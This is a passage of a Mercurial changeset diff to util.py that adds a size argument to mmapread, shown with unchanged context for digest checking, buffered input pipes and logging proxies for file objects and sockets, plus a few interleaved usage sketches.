mmap: add a size argument to mmapread...
Author: marmoute
Changeset: r44487:8ed8dfbe (default branch)
@@ -1,3611 +1,3617 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 procutil,
57 57 stringutil,
58 58 )
59 59
60 60 base85 = policy.importmod('base85')
61 61 osutil = policy.importmod('osutil')
62 62
63 63 b85decode = base85.b85decode
64 64 b85encode = base85.b85encode
65 65
66 66 cookielib = pycompat.cookielib
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 safehasattr = pycompat.safehasattr
70 70 socketserver = pycompat.socketserver
71 71 bytesio = pycompat.bytesio
72 72 # TODO deprecate stringio name, as it is a lie on Python 3.
73 73 stringio = bytesio
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 httpserver = urllibcompat.httpserver
77 77 urlerr = urllibcompat.urlerr
78 78 urlreq = urllibcompat.urlreq
79 79
80 80 # workaround for win32mbcs
81 81 _filenamebytestr = pycompat.bytestr
82 82
83 83 if pycompat.iswindows:
84 84 from . import windows as platform
85 85 else:
86 86 from . import posix as platform
87 87
88 88 _ = i18n._
89 89
90 90 bindunixsocket = platform.bindunixsocket
91 91 cachestat = platform.cachestat
92 92 checkexec = platform.checkexec
93 93 checklink = platform.checklink
94 94 copymode = platform.copymode
95 95 expandglobs = platform.expandglobs
96 96 getfsmountpoint = platform.getfsmountpoint
97 97 getfstype = platform.getfstype
98 98 groupmembers = platform.groupmembers
99 99 groupname = platform.groupname
100 100 isexec = platform.isexec
101 101 isowner = platform.isowner
102 102 listdir = osutil.listdir
103 103 localpath = platform.localpath
104 104 lookupreg = platform.lookupreg
105 105 makedir = platform.makedir
106 106 nlinks = platform.nlinks
107 107 normpath = platform.normpath
108 108 normcase = platform.normcase
109 109 normcasespec = platform.normcasespec
110 110 normcasefallback = platform.normcasefallback
111 111 openhardlinks = platform.openhardlinks
112 112 oslink = platform.oslink
113 113 parsepatchoutput = platform.parsepatchoutput
114 114 pconvert = platform.pconvert
115 115 poll = platform.poll
116 116 posixfile = platform.posixfile
117 117 readlink = platform.readlink
118 118 rename = platform.rename
119 119 removedirs = platform.removedirs
120 120 samedevice = platform.samedevice
121 121 samefile = platform.samefile
122 122 samestat = platform.samestat
123 123 setflags = platform.setflags
124 124 split = platform.split
125 125 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
126 126 statisexec = platform.statisexec
127 127 statislink = platform.statislink
128 128 umask = platform.umask
129 129 unlink = platform.unlink
130 130 username = platform.username
131 131
132 132 # small compat layer
133 133 compengines = compression.compengines
134 134 SERVERROLE = compression.SERVERROLE
135 135 CLIENTROLE = compression.CLIENTROLE
136 136
137 137 try:
138 138 recvfds = osutil.recvfds
139 139 except AttributeError:
140 140 pass
141 141
142 142 # Python compatibility
143 143
144 144 _notset = object()
145 145
146 146
147 147 def bitsfrom(container):
148 148 bits = 0
149 149 for bit in container:
150 150 bits |= bit
151 151 return bits
152 152
153 153
154 154 # Python 2.6 still has deprecation warnings enabled by default. We do not want
155 155 # to display anything to standard users, so detect if we are running tests and
156 156 # only use Python deprecation warnings in this case.
157 157 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
158 158 if _dowarn:
159 159 # explicitly unfilter our warning for python 2.7
160 160 #
161 161 # The option of setting PYTHONWARNINGS in the test runner was investigated.
162 162 # However, the module name set through PYTHONWARNINGS was matched exactly, so
163 163 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
164 164 # makes the whole PYTHONWARNINGS approach useless for our use case.
165 165 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
166 166 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
167 167 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
168 168 if _dowarn and pycompat.ispy3:
169 169 # silence warning emitted by passing user string to re.sub()
170 170 warnings.filterwarnings(
171 171 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
172 172 )
173 173 warnings.filterwarnings(
174 174 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
175 175 )
176 176 # TODO: reinvent imp.is_frozen()
177 177 warnings.filterwarnings(
178 178 'ignore',
179 179 'the imp module is deprecated',
180 180 DeprecationWarning,
181 181 'mercurial',
182 182 )
183 183
184 184
185 185 def nouideprecwarn(msg, version, stacklevel=1):
186 186 """Issue an python native deprecation warning
187 187
188 188 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
189 189 """
190 190 if _dowarn:
191 191 msg += (
192 192 b"\n(compatibility will be dropped after Mercurial-%s,"
193 193 b" update your code.)"
194 194 ) % version
195 195 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
196 196
197 197
198 198 DIGESTS = {
199 199 b'md5': hashlib.md5,
200 200 b'sha1': hashlib.sha1,
201 201 b'sha512': hashlib.sha512,
202 202 }
203 203 # List of digest types from strongest to weakest
204 204 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
205 205
206 206 for k in DIGESTS_BY_STRENGTH:
207 207 assert k in DIGESTS
208 208
209 209
210 210 class digester(object):
211 211 """helper to compute digests.
212 212
213 213 This helper can be used to compute one or more digests given their name.
214 214
215 215 >>> d = digester([b'md5', b'sha1'])
216 216 >>> d.update(b'foo')
217 217 >>> [k for k in sorted(d)]
218 218 ['md5', 'sha1']
219 219 >>> d[b'md5']
220 220 'acbd18db4cc2f85cedef654fccc4a4d8'
221 221 >>> d[b'sha1']
222 222 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
223 223 >>> digester.preferred([b'md5', b'sha1'])
224 224 'sha1'
225 225 """
226 226
227 227 def __init__(self, digests, s=b''):
228 228 self._hashes = {}
229 229 for k in digests:
230 230 if k not in DIGESTS:
231 231 raise error.Abort(_(b'unknown digest type: %s') % k)
232 232 self._hashes[k] = DIGESTS[k]()
233 233 if s:
234 234 self.update(s)
235 235
236 236 def update(self, data):
237 237 for h in self._hashes.values():
238 238 h.update(data)
239 239
240 240 def __getitem__(self, key):
241 241 if key not in DIGESTS:
242 242 raise error.Abort(_(b'unknown digest type: %s') % key)
243 243 return nodemod.hex(self._hashes[key].digest())
244 244
245 245 def __iter__(self):
246 246 return iter(self._hashes)
247 247
248 248 @staticmethod
249 249 def preferred(supported):
250 250 """returns the strongest digest type in both supported and DIGESTS."""
251 251
252 252 for k in DIGESTS_BY_STRENGTH:
253 253 if k in supported:
254 254 return k
255 255 return None
256 256
257 257
258 258 class digestchecker(object):
259 259 """file handle wrapper that additionally checks content against a given
260 260 size and digests.
261 261
262 262 d = digestchecker(fh, size, {'md5': '...'})
263 263
264 264 When multiple digests are given, all of them are validated.
265 265 """
266 266
267 267 def __init__(self, fh, size, digests):
268 268 self._fh = fh
269 269 self._size = size
270 270 self._got = 0
271 271 self._digests = dict(digests)
272 272 self._digester = digester(self._digests.keys())
273 273
274 274 def read(self, length=-1):
275 275 content = self._fh.read(length)
276 276 self._digester.update(content)
277 277 self._got += len(content)
278 278 return content
279 279
280 280 def validate(self):
281 281 if self._size != self._got:
282 282 raise error.Abort(
283 283 _(b'size mismatch: expected %d, got %d')
284 284 % (self._size, self._got)
285 285 )
286 286 for k, v in self._digests.items():
287 287 if v != self._digester[k]:
288 288 # i18n: first parameter is a digest name
289 289 raise error.Abort(
290 290 _(b'%s mismatch: expected %s, got %s')
291 291 % (k, v, self._digester[k])
292 292 )
293 293
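A minimal sketch of validating content with digestchecker (names come from this
module; the in-memory file and md5 value below are illustrative):

    import io

    payload = b'foo'
    wrapped = digestchecker(io.BytesIO(payload), len(payload),
                            {b'md5': b'acbd18db4cc2f85cedef654fccc4a4d8'})
    wrapped.read()
    wrapped.validate()   # raises error.Abort on a size or digest mismatch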
294 294
295 295 try:
296 296 buffer = buffer
297 297 except NameError:
298 298
299 299 def buffer(sliceable, offset=0, length=None):
300 300 if length is not None:
301 301 return memoryview(sliceable)[offset : offset + length]
302 302 return memoryview(sliceable)[offset:]
303 303
304 304
305 305 _chunksize = 4096
306 306
307 307
308 308 class bufferedinputpipe(object):
309 309 """a manually buffered input pipe
310 310
311 311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 312 the same time. We cannot probe the buffer state and select will not detect
313 313 that data are ready to read if they are already buffered.
314 314
315 315 This class lets us work around that by implementing its own buffering
316 316 (allowing efficient readline) while offering a way to know if the buffer is
317 317 empty from the output (allowing collaboration of the buffer with polling).
318 318
319 319 This class lives in the 'util' module because it makes use of the 'os'
320 320 module from the python stdlib.
321 321 """
322 322
323 323 def __new__(cls, fh):
324 324 # If we receive a fileobjectproxy, we need to use a variation of this
325 325 # class that notifies observers about activity.
326 326 if isinstance(fh, fileobjectproxy):
327 327 cls = observedbufferedinputpipe
328 328
329 329 return super(bufferedinputpipe, cls).__new__(cls)
330 330
331 331 def __init__(self, input):
332 332 self._input = input
333 333 self._buffer = []
334 334 self._eof = False
335 335 self._lenbuf = 0
336 336
337 337 @property
338 338 def hasbuffer(self):
339 339 """True is any data is currently buffered
340 340
341 341 This will be used externally a pre-step for polling IO. If there is
342 342 already data then no polling should be set in place."""
343 343 return bool(self._buffer)
344 344
345 345 @property
346 346 def closed(self):
347 347 return self._input.closed
348 348
349 349 def fileno(self):
350 350 return self._input.fileno()
351 351
352 352 def close(self):
353 353 return self._input.close()
354 354
355 355 def read(self, size):
356 356 while (not self._eof) and (self._lenbuf < size):
357 357 self._fillbuffer()
358 358 return self._frombuffer(size)
359 359
360 360 def unbufferedread(self, size):
361 361 if not self._eof and self._lenbuf == 0:
362 362 self._fillbuffer(max(size, _chunksize))
363 363 return self._frombuffer(min(self._lenbuf, size))
364 364
365 365 def readline(self, *args, **kwargs):
366 366 if len(self._buffer) > 1:
367 367 # this should not happen because both read and readline end with a
368 368 # _frombuffer call that collapses it.
369 369 self._buffer = [b''.join(self._buffer)]
370 370 self._lenbuf = len(self._buffer[0])
371 371 lfi = -1
372 372 if self._buffer:
373 373 lfi = self._buffer[-1].find(b'\n')
374 374 while (not self._eof) and lfi < 0:
375 375 self._fillbuffer()
376 376 if self._buffer:
377 377 lfi = self._buffer[-1].find(b'\n')
378 378 size = lfi + 1
379 379 if lfi < 0: # end of file
380 380 size = self._lenbuf
381 381 elif len(self._buffer) > 1:
382 382 # we need to take previous chunks into account
383 383 size += self._lenbuf - len(self._buffer[-1])
384 384 return self._frombuffer(size)
385 385
386 386 def _frombuffer(self, size):
387 387 """return at most 'size' data from the buffer
388 388
389 389 The data are removed from the buffer."""
390 390 if size == 0 or not self._buffer:
391 391 return b''
392 392 buf = self._buffer[0]
393 393 if len(self._buffer) > 1:
394 394 buf = b''.join(self._buffer)
395 395
396 396 data = buf[:size]
397 397 buf = buf[len(data) :]
398 398 if buf:
399 399 self._buffer = [buf]
400 400 self._lenbuf = len(buf)
401 401 else:
402 402 self._buffer = []
403 403 self._lenbuf = 0
404 404 return data
405 405
406 406 def _fillbuffer(self, size=_chunksize):
407 407 """read data to the buffer"""
408 408 data = os.read(self._input.fileno(), size)
409 409 if not data:
410 410 self._eof = True
411 411 else:
412 412 self._lenbuf += len(data)
413 413 self._buffer.append(data)
414 414
415 415 return data
416 416
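A rough usage sketch for bufferedinputpipe, assuming a POSIX pipe wrapped in a
file object (the data written is illustrative):

    import os

    r, w = os.pipe()
    os.write(w, b'first line\nrest')
    os.close(w)

    pipe = bufferedinputpipe(os.fdopen(r, 'rb'))
    assert not pipe.hasbuffer              # nothing buffered yet, safe to poll
    assert pipe.readline() == b'first line\n'
    assert pipe.hasbuffer                  # b'rest' is now buffered
    pipe.close()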
417 417
418 def mmapread(fp):
418 def mmapread(fp, size=None):
419 if size == 0:
420 # size of 0 to mmap.mmap() means "all data"
421 # rather than "zero bytes", so special case that.
422 return b''
423 elif size is None:
424 size = 0
419 425 try:
420 426 fd = getattr(fp, 'fileno', lambda: fp)()
421 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
427 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
422 428 except ValueError:
423 429 # Empty files cannot be mmapped, but mmapread should still work. Check
424 430 # if the file is empty, and if so, return an empty buffer.
425 431 if os.fstat(fd).st_size == 0:
426 432 return b''
427 433 raise
428 434
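A small sketch of the new size argument added by this change (the temporary
file and its contents are illustrative):

    import os
    import tempfile

    fd, path = tempfile.mkstemp()
    os.write(fd, b'some revlog-like data')
    os.close(fd)

    with open(path, 'rb') as fp:
        m = mmapread(fp, 4)              # map only the first 4 bytes
        assert m[:4] == b'some'
        assert mmapread(fp, 0) == b''    # explicit size of 0 yields no data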
429 435
430 436 class fileobjectproxy(object):
431 437 """A proxy around file objects that tells a watcher when events occur.
432 438
433 439 This type is intended to only be used for testing purposes. Think hard
434 440 before using it in important code.
435 441 """
436 442
437 443 __slots__ = (
438 444 '_orig',
439 445 '_observer',
440 446 )
441 447
442 448 def __init__(self, fh, observer):
443 449 object.__setattr__(self, '_orig', fh)
444 450 object.__setattr__(self, '_observer', observer)
445 451
446 452 def __getattribute__(self, name):
447 453 ours = {
448 454 '_observer',
449 455 # IOBase
450 456 'close',
452 458 # closed is a property
452 458 'fileno',
453 459 'flush',
454 460 'isatty',
455 461 'readable',
456 462 'readline',
457 463 'readlines',
458 464 'seek',
459 465 'seekable',
460 466 'tell',
461 467 'truncate',
462 468 'writable',
463 469 'writelines',
464 470 # RawIOBase
465 471 'read',
466 472 'readall',
467 473 'readinto',
468 474 'write',
469 475 # BufferedIOBase
470 476 # raw is a property
471 477 'detach',
472 478 # read defined above
473 479 'read1',
474 480 # readinto defined above
475 481 # write defined above
476 482 }
477 483
478 484 # We only observe some methods.
479 485 if name in ours:
480 486 return object.__getattribute__(self, name)
481 487
482 488 return getattr(object.__getattribute__(self, '_orig'), name)
483 489
484 490 def __nonzero__(self):
485 491 return bool(object.__getattribute__(self, '_orig'))
486 492
487 493 __bool__ = __nonzero__
488 494
489 495 def __delattr__(self, name):
490 496 return delattr(object.__getattribute__(self, '_orig'), name)
491 497
492 498 def __setattr__(self, name, value):
493 499 return setattr(object.__getattribute__(self, '_orig'), name, value)
494 500
495 501 def __iter__(self):
496 502 return object.__getattribute__(self, '_orig').__iter__()
497 503
498 504 def _observedcall(self, name, *args, **kwargs):
499 505 # Call the original object.
500 506 orig = object.__getattribute__(self, '_orig')
501 507 res = getattr(orig, name)(*args, **kwargs)
502 508
503 509 # Call a method on the observer of the same name with arguments
504 510 # so it can react, log, etc.
505 511 observer = object.__getattribute__(self, '_observer')
506 512 fn = getattr(observer, name, None)
507 513 if fn:
508 514 fn(res, *args, **kwargs)
509 515
510 516 return res
511 517
512 518 def close(self, *args, **kwargs):
513 519 return object.__getattribute__(self, '_observedcall')(
514 520 'close', *args, **kwargs
515 521 )
516 522
517 523 def fileno(self, *args, **kwargs):
518 524 return object.__getattribute__(self, '_observedcall')(
519 525 'fileno', *args, **kwargs
520 526 )
521 527
522 528 def flush(self, *args, **kwargs):
523 529 return object.__getattribute__(self, '_observedcall')(
524 530 'flush', *args, **kwargs
525 531 )
526 532
527 533 def isatty(self, *args, **kwargs):
528 534 return object.__getattribute__(self, '_observedcall')(
529 535 'isatty', *args, **kwargs
530 536 )
531 537
532 538 def readable(self, *args, **kwargs):
533 539 return object.__getattribute__(self, '_observedcall')(
534 540 'readable', *args, **kwargs
535 541 )
536 542
537 543 def readline(self, *args, **kwargs):
538 544 return object.__getattribute__(self, '_observedcall')(
539 545 'readline', *args, **kwargs
540 546 )
541 547
542 548 def readlines(self, *args, **kwargs):
543 549 return object.__getattribute__(self, '_observedcall')(
544 550 'readlines', *args, **kwargs
545 551 )
546 552
547 553 def seek(self, *args, **kwargs):
548 554 return object.__getattribute__(self, '_observedcall')(
549 555 'seek', *args, **kwargs
550 556 )
551 557
552 558 def seekable(self, *args, **kwargs):
553 559 return object.__getattribute__(self, '_observedcall')(
554 560 'seekable', *args, **kwargs
555 561 )
556 562
557 563 def tell(self, *args, **kwargs):
558 564 return object.__getattribute__(self, '_observedcall')(
559 565 'tell', *args, **kwargs
560 566 )
561 567
562 568 def truncate(self, *args, **kwargs):
563 569 return object.__getattribute__(self, '_observedcall')(
564 570 'truncate', *args, **kwargs
565 571 )
566 572
567 573 def writable(self, *args, **kwargs):
568 574 return object.__getattribute__(self, '_observedcall')(
569 575 'writable', *args, **kwargs
570 576 )
571 577
572 578 def writelines(self, *args, **kwargs):
573 579 return object.__getattribute__(self, '_observedcall')(
574 580 'writelines', *args, **kwargs
575 581 )
576 582
577 583 def read(self, *args, **kwargs):
578 584 return object.__getattribute__(self, '_observedcall')(
579 585 'read', *args, **kwargs
580 586 )
581 587
582 588 def readall(self, *args, **kwargs):
583 589 return object.__getattribute__(self, '_observedcall')(
584 590 'readall', *args, **kwargs
585 591 )
586 592
587 593 def readinto(self, *args, **kwargs):
588 594 return object.__getattribute__(self, '_observedcall')(
589 595 'readinto', *args, **kwargs
590 596 )
591 597
592 598 def write(self, *args, **kwargs):
593 599 return object.__getattribute__(self, '_observedcall')(
594 600 'write', *args, **kwargs
595 601 )
596 602
597 603 def detach(self, *args, **kwargs):
598 604 return object.__getattribute__(self, '_observedcall')(
599 605 'detach', *args, **kwargs
600 606 )
601 607
602 608 def read1(self, *args, **kwargs):
603 609 return object.__getattribute__(self, '_observedcall')(
604 610 'read1', *args, **kwargs
605 611 )
606 612
607 613
608 614 class observedbufferedinputpipe(bufferedinputpipe):
609 615 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
610 616
611 617 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
612 618 bypass ``fileobjectproxy``. Because of this, we need to make
613 619 ``bufferedinputpipe`` aware of these operations.
614 620
615 621 This variation of ``bufferedinputpipe`` can notify observers about
616 622 ``os.read()`` events. It also re-publishes other events, such as
617 623 ``read()`` and ``readline()``.
618 624 """
619 625
620 626 def _fillbuffer(self):
621 627 res = super(observedbufferedinputpipe, self)._fillbuffer()
622 628
623 629 fn = getattr(self._input._observer, 'osread', None)
624 630 if fn:
625 631 fn(res, _chunksize)
626 632
627 633 return res
628 634
629 635 # We use different observer methods because the operation isn't
630 636 # performed on the actual file object but on us.
631 637 def read(self, size):
632 638 res = super(observedbufferedinputpipe, self).read(size)
633 639
634 640 fn = getattr(self._input._observer, 'bufferedread', None)
635 641 if fn:
636 642 fn(res, size)
637 643
638 644 return res
639 645
640 646 def readline(self, *args, **kwargs):
641 647 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
642 648
643 649 fn = getattr(self._input._observer, 'bufferedreadline', None)
644 650 if fn:
645 651 fn(res)
646 652
647 653 return res
648 654
649 655
650 656 PROXIED_SOCKET_METHODS = {
651 657 'makefile',
652 658 'recv',
653 659 'recvfrom',
654 660 'recvfrom_into',
655 661 'recv_into',
656 662 'send',
657 663 'sendall',
658 664 'sendto',
659 665 'setblocking',
660 666 'settimeout',
661 667 'gettimeout',
662 668 'setsockopt',
663 669 }
664 670
665 671
666 672 class socketproxy(object):
667 673 """A proxy around a socket that tells a watcher when events occur.
668 674
669 675 This is like ``fileobjectproxy`` except for sockets.
670 676
671 677 This type is intended to only be used for testing purposes. Think hard
672 678 before using it in important code.
673 679 """
674 680
675 681 __slots__ = (
676 682 '_orig',
677 683 '_observer',
678 684 )
679 685
680 686 def __init__(self, sock, observer):
681 687 object.__setattr__(self, '_orig', sock)
682 688 object.__setattr__(self, '_observer', observer)
683 689
684 690 def __getattribute__(self, name):
685 691 if name in PROXIED_SOCKET_METHODS:
686 692 return object.__getattribute__(self, name)
687 693
688 694 return getattr(object.__getattribute__(self, '_orig'), name)
689 695
690 696 def __delattr__(self, name):
691 697 return delattr(object.__getattribute__(self, '_orig'), name)
692 698
693 699 def __setattr__(self, name, value):
694 700 return setattr(object.__getattribute__(self, '_orig'), name, value)
695 701
696 702 def __nonzero__(self):
697 703 return bool(object.__getattribute__(self, '_orig'))
698 704
699 705 __bool__ = __nonzero__
700 706
701 707 def _observedcall(self, name, *args, **kwargs):
702 708 # Call the original object.
703 709 orig = object.__getattribute__(self, '_orig')
704 710 res = getattr(orig, name)(*args, **kwargs)
705 711
706 712 # Call a method on the observer of the same name with arguments
707 713 # so it can react, log, etc.
708 714 observer = object.__getattribute__(self, '_observer')
709 715 fn = getattr(observer, name, None)
710 716 if fn:
711 717 fn(res, *args, **kwargs)
712 718
713 719 return res
714 720
715 721 def makefile(self, *args, **kwargs):
716 722 res = object.__getattribute__(self, '_observedcall')(
717 723 'makefile', *args, **kwargs
718 724 )
719 725
720 726 # The file object may be used for I/O. So we turn it into a
721 727 # proxy using our observer.
722 728 observer = object.__getattribute__(self, '_observer')
723 729 return makeloggingfileobject(
724 730 observer.fh,
725 731 res,
726 732 observer.name,
727 733 reads=observer.reads,
728 734 writes=observer.writes,
729 735 logdata=observer.logdata,
730 736 logdataapis=observer.logdataapis,
731 737 )
732 738
733 739 def recv(self, *args, **kwargs):
734 740 return object.__getattribute__(self, '_observedcall')(
735 741 'recv', *args, **kwargs
736 742 )
737 743
738 744 def recvfrom(self, *args, **kwargs):
739 745 return object.__getattribute__(self, '_observedcall')(
740 746 'recvfrom', *args, **kwargs
741 747 )
742 748
743 749 def recvfrom_into(self, *args, **kwargs):
744 750 return object.__getattribute__(self, '_observedcall')(
745 751 'recvfrom_into', *args, **kwargs
746 752 )
747 753
748 754 def recv_into(self, *args, **kwargs):
749 755 return object.__getattribute__(self, '_observedcall')(
750 756 'recv_into', *args, **kwargs
751 757 )
752 758
753 759 def send(self, *args, **kwargs):
754 760 return object.__getattribute__(self, '_observedcall')(
755 761 'send', *args, **kwargs
756 762 )
757 763
758 764 def sendall(self, *args, **kwargs):
759 765 return object.__getattribute__(self, '_observedcall')(
760 766 'sendall', *args, **kwargs
761 767 )
762 768
763 769 def sendto(self, *args, **kwargs):
764 770 return object.__getattribute__(self, '_observedcall')(
765 771 'sendto', *args, **kwargs
766 772 )
767 773
768 774 def setblocking(self, *args, **kwargs):
769 775 return object.__getattribute__(self, '_observedcall')(
770 776 'setblocking', *args, **kwargs
771 777 )
772 778
773 779 def settimeout(self, *args, **kwargs):
774 780 return object.__getattribute__(self, '_observedcall')(
775 781 'settimeout', *args, **kwargs
776 782 )
777 783
778 784 def gettimeout(self, *args, **kwargs):
779 785 return object.__getattribute__(self, '_observedcall')(
780 786 'gettimeout', *args, **kwargs
781 787 )
782 788
783 789 def setsockopt(self, *args, **kwargs):
784 790 return object.__getattribute__(self, '_observedcall')(
785 791 'setsockopt', *args, **kwargs
786 792 )
787 793
788 794
789 795 class baseproxyobserver(object):
790 796 def __init__(self, fh, name, logdata, logdataapis):
791 797 self.fh = fh
792 798 self.name = name
793 799 self.logdata = logdata
794 800 self.logdataapis = logdataapis
795 801
796 802 def _writedata(self, data):
797 803 if not self.logdata:
798 804 if self.logdataapis:
799 805 self.fh.write(b'\n')
800 806 self.fh.flush()
801 807 return
802 808
803 809 # Simple case writes all data on a single line.
804 810 if b'\n' not in data:
805 811 if self.logdataapis:
806 812 self.fh.write(b': %s\n' % stringutil.escapestr(data))
807 813 else:
808 814 self.fh.write(
809 815 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
810 816 )
811 817 self.fh.flush()
812 818 return
813 819
814 820 # Data with newlines is written to multiple lines.
815 821 if self.logdataapis:
816 822 self.fh.write(b':\n')
817 823
818 824 lines = data.splitlines(True)
819 825 for line in lines:
820 826 self.fh.write(
821 827 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
822 828 )
823 829 self.fh.flush()
824 830
825 831
826 832 class fileobjectobserver(baseproxyobserver):
827 833 """Logs file object activity."""
828 834
829 835 def __init__(
830 836 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
831 837 ):
832 838 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
833 839 self.reads = reads
834 840 self.writes = writes
835 841
836 842 def read(self, res, size=-1):
837 843 if not self.reads:
838 844 return
839 845 # Python 3 can return None from reads at EOF instead of empty strings.
840 846 if res is None:
841 847 res = b''
842 848
843 849 if size == -1 and res == b'':
844 850 # Suppress pointless read(-1) calls that return
845 851 # nothing. These happen _a lot_ on Python 3, and there
846 852 # doesn't seem to be a better workaround to have matching
847 853 # Python 2 and 3 behavior. :(
848 854 return
849 855
850 856 if self.logdataapis:
851 857 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852 858
853 859 self._writedata(res)
854 860
855 861 def readline(self, res, limit=-1):
856 862 if not self.reads:
857 863 return
858 864
859 865 if self.logdataapis:
860 866 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861 867
862 868 self._writedata(res)
863 869
864 870 def readinto(self, res, dest):
865 871 if not self.reads:
866 872 return
867 873
868 874 if self.logdataapis:
869 875 self.fh.write(
870 876 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 877 )
872 878
873 879 data = dest[0:res] if res is not None else b''
874 880
875 881 # _writedata() uses "in" operator and is confused by memoryview because
876 882 # characters are ints on Python 3.
877 883 if isinstance(data, memoryview):
878 884 data = data.tobytes()
879 885
880 886 self._writedata(data)
881 887
882 888 def write(self, res, data):
883 889 if not self.writes:
884 890 return
885 891
886 892 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 893 # returns the integer bytes written.
888 894 if res is None and data:
889 895 res = len(data)
890 896
891 897 if self.logdataapis:
892 898 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893 899
894 900 self._writedata(data)
895 901
896 902 def flush(self, res):
897 903 if not self.writes:
898 904 return
899 905
900 906 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901 907
902 908 # For observedbufferedinputpipe.
903 909 def bufferedread(self, res, size):
904 910 if not self.reads:
905 911 return
906 912
907 913 if self.logdataapis:
908 914 self.fh.write(
909 915 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 916 )
911 917
912 918 self._writedata(res)
913 919
914 920 def bufferedreadline(self, res):
915 921 if not self.reads:
916 922 return
917 923
918 924 if self.logdataapis:
919 925 self.fh.write(
920 926 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 927 )
922 928
923 929 self._writedata(res)
924 930
925 931
926 932 def makeloggingfileobject(
927 933 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 934 ):
929 935 """Turn a file object into a logging file object."""
930 936
931 937 observer = fileobjectobserver(
932 938 logh,
933 939 name,
934 940 reads=reads,
935 941 writes=writes,
936 942 logdata=logdata,
937 943 logdataapis=logdataapis,
938 944 )
939 945 return fileobjectproxy(fh, observer)
940 946
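A minimal sketch of observing file I/O via makeloggingfileobject (BytesIO
stands in for real handles; the exact log text is approximate):

    import io

    logfh = io.BytesIO()
    proxied = makeloggingfileobject(logfh, io.BytesIO(b'payload'), b'src',
                                    logdata=True)
    proxied.read(3)
    # logfh now holds a line along the lines of b'src> read(3) -> 3: pay'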
941 947
942 948 class socketobserver(baseproxyobserver):
943 949 """Logs socket activity."""
944 950
945 951 def __init__(
946 952 self,
947 953 fh,
948 954 name,
949 955 reads=True,
950 956 writes=True,
951 957 states=True,
952 958 logdata=False,
953 959 logdataapis=True,
954 960 ):
955 961 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
956 962 self.reads = reads
957 963 self.writes = writes
958 964 self.states = states
959 965
960 966 def makefile(self, res, mode=None, bufsize=None):
961 967 if not self.states:
962 968 return
963 969
964 970 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
965 971
966 972 def recv(self, res, size, flags=0):
967 973 if not self.reads:
968 974 return
969 975
970 976 if self.logdataapis:
971 977 self.fh.write(
972 978 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
973 979 )
974 980 self._writedata(res)
975 981
976 982 def recvfrom(self, res, size, flags=0):
977 983 if not self.reads:
978 984 return
979 985
980 986 if self.logdataapis:
981 987 self.fh.write(
982 988 b'%s> recvfrom(%d, %d) -> %d'
983 989 % (self.name, size, flags, len(res[0]))
984 990 )
985 991
986 992 self._writedata(res[0])
987 993
988 994 def recvfrom_into(self, res, buf, size, flags=0):
989 995 if not self.reads:
990 996 return
991 997
992 998 if self.logdataapis:
993 999 self.fh.write(
994 1000 b'%s> recvfrom_into(%d, %d) -> %d'
995 1001 % (self.name, size, flags, res[0])
996 1002 )
997 1003
998 1004 self._writedata(buf[0 : res[0]])
999 1005
1000 1006 def recv_into(self, res, buf, size=0, flags=0):
1001 1007 if not self.reads:
1002 1008 return
1003 1009
1004 1010 if self.logdataapis:
1005 1011 self.fh.write(
